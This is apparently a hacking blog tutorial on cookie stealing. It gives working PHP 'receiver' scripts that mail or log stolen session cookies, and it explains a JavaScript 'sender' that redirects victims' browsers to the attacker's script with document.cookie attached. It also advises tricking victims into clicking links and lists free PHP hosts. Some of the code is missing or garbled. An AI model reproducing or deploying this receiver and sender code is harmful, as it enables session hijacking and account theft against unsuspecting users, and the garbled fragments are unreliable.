Your Ad Here

Cookie Stealing : Basics!
hello,this is zizipo[whos running out of tutorials!!] i deciced to talk about cookie stealers:) which can be used to hack passwords,forums... so my first question 2 u is what is a cookie stealer? how does it work? so i can respond to that:).. just like an email,the cookie has a receiver and sender!..

the sender must know social engineering or so.. and they can attach the cookie to something !..

and the receiver.. well the name says it all!:)


so the first thing you have to learn is the code:).. n00bs.. find difficulties with making the code:).the only 2 things needed to make a receiver are a webhost[needs to support pho],and notepad!... http get method is the best method to send information to a PhP document!, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS

  • ,x is the argument name:D.

the receiver must receive the cookie,so just use mails.. or logs. ill talk about both!.. .


ill start with emailing.this is a beast[functioning code]
Code:
// line 1
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?>
// line 4

Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.

now the second way.. which is storing it inside a log.. . (functioning code)
Code:
// line 1
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?>
// line 5

Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.


Step Two: Implementing the Stealer

using the sender is the hardest part in cookie stealing!. the easiest things,require html and java which isnt that easy!!. Here is an example of a sender.

HTML
// Line 3

Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line
2 adds document.cookie to the end of the URL, which is then stored in
document.location. Whenever document.location is changed, the browser
is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).


here is how the sender will work:)

to
do that.. you can trick the receiver like posting the cookie code on a
website. and the receiver actually thinking it was an html!.. .

You can trick the victim into clicking a link which activates the sender. For example:

HTML
Click here!
Free PHP hosts:
http://www.0php.com/free_PHP_webhosting.php
http://www.free-webhosts.com/free-php-webhosting.php

Posted by Cyber Trunks

0 comments:

Your Ad Here